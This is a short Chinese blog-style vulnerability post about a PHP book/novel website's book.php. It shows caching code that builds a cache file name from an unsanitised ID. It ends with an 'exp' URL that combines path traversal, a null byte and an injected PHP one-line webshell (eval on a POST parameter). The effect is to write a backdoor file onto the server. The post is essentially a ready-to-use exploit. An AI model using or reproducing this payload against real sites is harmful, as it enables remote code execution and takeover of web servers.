PHP代码
  1. 很傻比的一漏洞   
  2. 必须开启缓存才能利用    
  3. 先看代码   
  4. book.php   
  5. $kd_cachedir = "./cache";     
  6. if($kd_book_cache=="ture"){//缓存必须开启   
  7.    $lastflesh = @filemtime($kd_cachedir."/book$shuid.html");   
  8.   // echo $lastflesh;   
  9.      if(!file_exists("./cache/book$shuid.html"or ($lastflesh + ($kd_book_hctime * 60 * 60) <= time())){   
  10.            ob_start();         
  11.               include "./templates/$kd_moban/book.html";   
  12.               $mianfei = ob_get_contents();   
  13.               ob_end_clean();    
  14.                   file_put_contents("./cache/book$shuid.html",$mianfei);     
  15.                  echo file_get_contents($kd_cachedir."/book$shuid.html");   
  16.           }else{   
  17.                      echo file_get_contents("./cache/book$shuid.html");   
  18.   
  19.                   }    
  20.       }else{   
  21.             include "./templates/$kd_moban/book.html";   
  22.           }   
  23.   
  24. ?>   
  25. exp:   http://hellxman.blog.51cto.com/ book.php?id=/../../1.php%00“><?php eval($_POST[a])?>